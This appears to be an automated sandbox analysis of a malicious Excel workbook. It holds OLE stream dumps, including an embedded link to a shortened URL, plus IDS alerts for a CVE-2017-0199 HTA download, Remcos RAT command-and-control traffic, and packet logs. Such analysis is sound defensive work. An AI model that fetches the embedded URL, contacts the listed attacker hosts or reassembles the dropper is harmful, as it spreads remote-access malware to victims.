Data Raw: 01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 db f3 1b 0a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

General
Stream Path: \x1CompObj
CLSID:
File Type: data
Stream Size: 114
Entropy: 4.25248375192737
Base64 Encoded: True
Data ASCII: . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path: \x5DocumentSummaryInformation
CLSID:
File Type: data
Stream Size: 244
Entropy: 2.889430592781307
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw: fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path: \x5SummaryInformation
CLSID:
File Type: data
Stream Size: 200
Entropy: 3.2920681057018664
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . ] . . . . . . . . . .
Data Raw: fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

General
Stream Path: MBD0001A430/\x1CompObj
CLSID:
File Type: data
Stream Size: 99
Entropy: 3.631242196770981
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path: MBD0001A430/Package
CLSID:
File Type: Microsoft Excel 2007+
Stream Size: 27478
Entropy: 7.767256957232999
Base64 Encoded: True
Data ASCII: P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path: MBD0001A431/\x1Ole
CLSID:
File Type: data
Stream Size: 754
Entropy: 5.124908797693868
Base64 Encoded: False
Data ASCII: . . . . . < J . . c r . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . o . g . 1 . . . i . n . / . 2 . R . x . z . b . 3 . . . . y } ' 8 k o Q D ; Q i 8 _ . $ = m > L w . | : K e D b z I % ' . ; d c f l ` H . . m . . . ) . 1 . @ I M W b . [ . . X } . h . b d . . ` K . . . . . . . . . . . . . . . . . . . X . Z . y . K . 1 . J . C . r . k . M . a . 1 . Q . s . P . D . 7 . 0 . 9 . c . j . a . E . C . V . c . 5 . S . 9 . r . r . 4 . O . 7 . x . n . n . d . b . E . A . P . 2 . 6
Data Raw: 01 00 00 02 7f 3c d2 4a 07 0d 63 72 00 00 00 00 00 00 00 00 00 00 00 00 ae 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b aa 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6f 00 67 00 31 00 2e 00 69 00 6e 00 2f 00 32 00 52 00 78 00 7a 00 62 00 33 00 00 00 01 f8 79 20 ef 7d 27 38 6b b7 fa 6f 51 44 b1 e2 8f cc 3b 51 69 38 fe 5f b7 f8 15 d4 24 3d 8a df 6d 3e a2 4c

General
Stream Path: Workbook
CLSID:
File Type: Applesoft BASIC program data, first line number 16
Stream Size: 609346
Entropy: 7.999424519225426
Base64 Encoded: True
Data ASCII: . . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . . n U l . . 1 , ' . V . _ 8 J Q C y [ . | \\ . A L 1 b . . . . . . . . . . \\ . p . R : N g \\ . 0 . 1 . | y u J % . * . 2 Z . L . . S 2 , . . 0 K . R . 7 6 5 X 0 f . . . . { 5 9 N . b . ~ . $ + Q . % k v . q Y # ' . B . . . ; P a . . . . . . . = . . . @ & . . . . 9 . @ . . . . . . K * . . . . n M . . . . . . . . . . . . . . . = . . . ` $ v f . . h . . h w . @ . . . . . . . J " . . . . . . . . . . . . . . { 1 . . . . . : K ~ . b ' . M 0 Y \\ 1 . . . ) T
Data Raw: 09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 0c 2e d0 8c 6e f8 f1 55 6c eb 7f 07 31 8e 2c 27 13 56 1a d2 f9 92 c1 ef 5f e2 38 ad 85 e4 4a 51 80 9b 43 c0 79 5b 0b 7c 5c 0e 41 4c a9 31 62 99 e1 00 02 00 b0 04 c1 00 02 00 bd 92 e2 00 00 00 5c 00 70 00 52 bb 97 96 3a ea 4e 67 5c 02 30 ff 09 31 e8 90 dc 9c 7c 98 79 a5 75 f9 92 a4 a1 e5 4a f3

General
Stream Path: _VBA_PROJECT_CUR/PROJECT
CLSID:
File Type: ASCII text, with CRLF line terminators
Stream Size: 523
Entropy: 5.230836006864179
Base64 Encoded: True
Data ASCII: I D = " { 6 D 9 F A 5 1 B - 4 A A 7 - 4 6 E 3 - A F F 2 - D 8 8 9 5 3 F E B 8 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B 2 B 0 9 E 5 C 1 A 6 0 1 A 6 0 1
Data Raw: 49 44 3d 22 7b 36 44 39 46 41 35 31 42 2d 34 41 41 37 2d 34 36 45 33 2d 41 46 46 32 2d 44 38 38 39 35 33 46 45 42 38 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

General
Stream Path: _VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type: data
Stream Size: 104
Entropy: 3.0488640812019017
Base64 Encoded: False
Data ASCII: T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw: 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

General
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type: data
Stream Size: 2644
Entropy: 3.9689034279980033
Base64 Encoded: True
Data ASCII: a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw: cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

General
Stream Path: _VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type: data
Stream Size: 553
Entropy: 6.360876788840636
Base64 Encoded: True
Data ASCII: . % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 2 . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
Data Raw: 01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 32 8e 0a 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
Suricata IDS alerts

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-30T09:53:25.270470+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49164 | 192.3.220.22 | 80 | TCP
2024-09-30T09:53:25.275410+0200 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 192.3.220.22 | 80 | 192.168.2.22 | 49164 | TCP
2024-09-30T09:53:27.893925+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49166 | 192.3.220.22 | 80 | TCP
2024-09-30T09:53:27.893933+0200 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 192.3.220.22 | 80 | 192.168.2.22 | 49166 | TCP
2024-09-30T09:53:50.060315+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49172 | 192.3.220.22 | 80 | TCP
2024-09-30T09:56:14.719678+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.22 | 49173 | 192.3.220.22 | 80 | TCP
2024-09-30T09:56:18.415693+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49174 | 107.173.4.16 | 2404 | TCP
2024-09-30T09:56:20.260276+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49175 | 107.173.4.16 | 2404 | TCP
2024-09-30T09:56:20.741800+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.22 | 49176 | 178.237.33.50 | 80 | TCP
2024-09-30T09:57:00.947013+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.22 | 49177 | 192.3.220.22 | 80 | TCP
Timestamp                             SrcPort  DstPort  Source IP        Dest IP
Sep 30, 2024 09:53:23.427298069 CEST    49163      443  192.168.2.22     104.21.78.54
Sep 30, 2024 09:53:23.427340031 CEST      443    49163  104.21.78.54     192.168.2.22
Sep 30, 2024 09:53:23.427418947 CEST    49163      443  192.168.2.22     104.21.78.54
Sep 30, 2024 09:53:23.433723927 CEST    49163      443  192.168.2.22     104.21.78.54
Sep 30, 2024 09:53:23.433741093 CEST      443    49163  104.21.78.54     192.168.2.22
Sep 30, 2024 09:53:23.897062063 CEST      443    49163  104.21.78.54     192.168.2.22
Sep 30, 2024 09:53:23.897223949 CEST    49163      443  192.168.2.22     104.21.78.54
Sep 30, 2024 09:53:23.902725935 CEST    49163      443  192.168.2.22     104.21.78.54
Sep 30, 2024 09:53:23.902733088 CEST      443    49163  104.21.78.54     192.168.2.22
Sep 30, 2024 09:53:23.903028965 CEST      443    49163  104.21.78.54     192.168.2.22
Sep 30, 2024 09:53:23.903078079 CEST    49163      443  192.168.2.22     104.21.78.54
Sep 30, 2024 09:53:23.986929893 CEST    49163      443  192.168.2.22     104.21.78.54
Sep 30, 2024 09:53:24.027400017 CEST      443    49163  104.21.78.54     192.168.2.22
Sep 30, 2024 09:53:24.764448881 CEST      443    49163  104.21.78.54     192.168.2.22
Sep 30, 2024 09:53:24.764528990 CEST      443    49163  104.21.78.54     192.168.2.22
Sep 30, 2024 09:53:24.764621019 CEST    49163      443  192.168.2.22     104.21.78.54
Sep 30, 2024 09:53:24.765052080 CEST    49163      443  192.168.2.22     104.21.78.54
Sep 30, 2024 09:53:24.766000032 CEST    49163      443  192.168.2.22     104.21.78.54
Sep 30, 2024 09:53:24.766012907 CEST      443    49163  104.21.78.54     192.168.2.22
Sep 30, 2024 09:53:24.777735949 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:24.782713890 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:24.782807112 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:24.782862902 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:24.787741899 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.270328999 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.270344973 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.270355940 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.270370007 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.270380974 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.270396948 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.270409107 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.270421982 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.270435095 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.270447969 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.270469904 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.270515919 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.270515919 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.275409937 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.275475979 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.275490046 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.275532007 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.276501894 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.359204054 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.359220982 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.359234095 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.359261990 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.359288931 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.359289885 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.359299898 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.359309912 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.359321117 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.359329939 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.359330893 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.359343052 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.359347105 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.359364033 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.359378099 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.359749079 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.359760046 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.359780073 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.359788895 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.359800100 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.359807014 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.359812975 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.359831095 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.359846115 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.360567093 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.360585928 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.360596895 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.360609055 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.360626936 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.360635996 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.360647917 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.360671997 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.360685110 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.361798048 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.361849070 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.362013102 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.362056017 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.362159967 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.362199068 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.365792990 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.365806103 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.365817070 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.365840912 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.365856886 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.448424101 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.448481083 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.448697090 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.448710918 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.448723078 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.448734999 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.448740959 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.448754072 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.448769093 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.448880911 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.448893070 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.448904991 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.448915958 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.448925972 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.448926926 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.448936939 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.448939085 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.448952913 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.448968887 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.448968887 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.448985100 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.449026108 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.449038982 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.449048996 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.449065924 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.449085951 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.449996948 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450007915 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450018883 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450030088 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450046062 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.450059891 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.450139999 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450150967 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450160980 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450171947 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450181961 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.450195074 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.450212955 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.450664043 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450701952 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.450856924 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450867891 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450879097 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450885057 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450896025 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450901031 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.450907946 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450913906 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.450918913 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.450932980 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.450954914 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.450954914 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.450985909 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.451030016 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.451546907 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.451590061 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.451716900 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.451728106 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.451757908 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.451770067 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.668700933 CEST       80    49164  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:25.668786049 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.760636091 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.761272907 CEST    49164       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:25.773030043 CEST    49165      443  192.168.2.22     172.67.216.244
Sep 30, 2024 09:53:25.773061037 CEST      443    49165  172.67.216.244   192.168.2.22
Sep 30, 2024 09:53:25.773147106 CEST    49165      443  192.168.2.22     172.67.216.244
